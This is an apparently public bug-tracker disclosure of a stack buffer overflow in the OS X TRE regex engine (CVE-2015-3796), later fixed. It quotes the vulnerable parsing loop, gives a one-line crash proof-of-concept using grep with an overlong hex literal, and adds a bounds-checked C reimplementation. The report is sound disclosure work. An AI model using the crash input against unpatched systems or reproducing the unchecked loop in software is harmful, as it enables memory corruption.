Status: Fixed
Closed: Aug 2015
Stack buffer overflow in OS X regex engine (TRE)
Project Member Reported by ianbeer@google.com, Jun 4 2015
OS X Libc uses the slightly obscure TRE regex engine [ http://laurikari.net/tre/ ].

If used in enhanced mode (by passing the REG_ENHANCED flag to regcomp) TRE supports arbitrary-width hex literals. Here is the code used to parse them:

  /* Wide char. */
  char tmp[32];
  long val;
  int i = 0;
  ctx->re++;
  while (ctx->re_end - ctx->re >= 0)
    {
      if (ctx->re[0] == CHAR_RBRACE)
        break;
      if (tre_isxdigit_l(ctx->re[0], ctx->loc))
        {
          tmp[i] = (char)ctx->re[0];  /* i is never checked against sizeof(tmp) */
          i++;
          ctx->re++;
          continue;
        }
      return REG_EBRACE;
    }

ctx->re points to the regex characters. This code blindly copies hex characters from the regex into the 32-byte stack buffer tmp until it encounters either a non-hex character or a '}'...

I'm still not sure exactly what's compiled with REG_ENHANCED, but at least grep is; try this PoC on an OS X machine:

lldb -- grep "\\\\x{`perl -e 'print "A"x1000;'`}" /bin/bash

That should crash trying to read and write pointers near 0x4141414141414141.

Severity Medium because I still need to find either a priv-esc or remote context in which you can control the regex when REG_ENHANCED is enabled.
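As an added illustration, not TRE's code and not part of the report above: a stand-alone C reimplementation of the brace-delimited hex-literal parse with the length check the quoted loop lacks. The parser keeps the same 32-byte stack buffer but refuses to store a digit once the buffer (minus room for a NUL) is full, stops before the end of the pattern instead of at it, and rejects a literal with no digits or no closing brace. The names parse_hex_brace, hex_brace_status, overlong_status, the parse_ctx struct and the HEX_* status codes are assumptions made for this example; TRE's real context structure and error codes differ.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical status codes for this example, not TRE's real values. */
enum { HEX_OK = 0, HEX_EBRACE = 1, HEX_ETOOLONG = 2 };

/* Cursor into the pattern text, mirroring the ctx->re / ctx->re_end pair. */
struct parse_ctx {
    const char *re;      /* current position, just past "\x{" */
    const char *re_end;  /* one past the last pattern character */
};

/* Hardened parse of a brace-delimited hex literal.
 * On success advances ctx->re past the closing '}' and stores the value. */
static int parse_hex_brace(struct parse_ctx *ctx, long *out)
{
    char tmp[32];
    size_t i = 0;

    /* '>' rather than '>=': when re == re_end there is nothing left to read. */
    while (ctx->re_end - ctx->re > 0) {
        unsigned char c = (unsigned char)ctx->re[0];
        if (c == '}') {
            if (i == 0)
                return HEX_EBRACE;        /* "\x{}" carries no digits */
            tmp[i] = '\0';
            *out = strtol(tmp, NULL, 16);
            ctx->re++;                    /* consume the '}' */
            return HEX_OK;
        }
        if (!isxdigit(c))
            return HEX_EBRACE;            /* same answer as the original */
        if (i >= sizeof(tmp) - 1)         /* keep one byte for the NUL */
            return HEX_ETOOLONG;          /* the bound the original never checks */
        tmp[i++] = (char)c;
        ctx->re++;
    }
    return HEX_EBRACE;                    /* pattern ended before the '}' */
}

/* Parse the text that follows "\x{" in a NUL-terminated string. */
int hex_brace_status(const char *after_brace, long *value)
{
    struct parse_ctx ctx = { after_brace, after_brace + strlen(after_brace) };
    return parse_hex_brace(&ctx, value);
}

/* Build a literal of ndigits hex digits ('A' repeated) plus '}' and parse it;
 * this is the shape of the PoC pattern from the report. */
int overlong_status(size_t ndigits)
{
    char *buf = malloc(ndigits + 2);
    long v = 0;
    int st;
    if (buf == NULL)
        return -1;
    memset(buf, 'A', ndigits);
    buf[ndigits] = '}';
    buf[ndigits + 1] = '\0';
    st = hex_brace_status(buf, &v);
    free(buf);
    return st;
}

int main(void)
{
    long v = 0;
    /* Constructed inputs: a normal literal and the 1000-digit one from the PoC. */
    printf("\"41}\"          -> status %d, value 0x%lx\n", hex_brace_status("41}", &v), v);
    printf("1000 x 'A' + '}' -> status %d\n", overlong_status(1000));
    return 0;
}
```

The bound here is tied to sizeof(tmp) because that is the buffer the original overruns; a stricter parser would also cap the digit count at what a single wide character can hold, since strtol saturates on a 31-digit value rather than reporting it.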
 
Project Member Comment 1 by ianbeer@google.com, Jun 10 2015
Labels: Reported-2015-Jun-10 Id-623973242
Project Member Comment 2 by ianbeer@google.com, Aug 14 2015
Labels: CVE-2015-3796 Fixed-2015-Aug-13 Product-iOS
Status: Fixed
OS X advisory: https://support.apple.com/en-us/HT205031
iOS advisory: https://support.apple.com/en-us/HT205030
Project Member Comment 3 by ianbeer@google.com, Sep 21 2015
Labels: -Restrict-View-Commit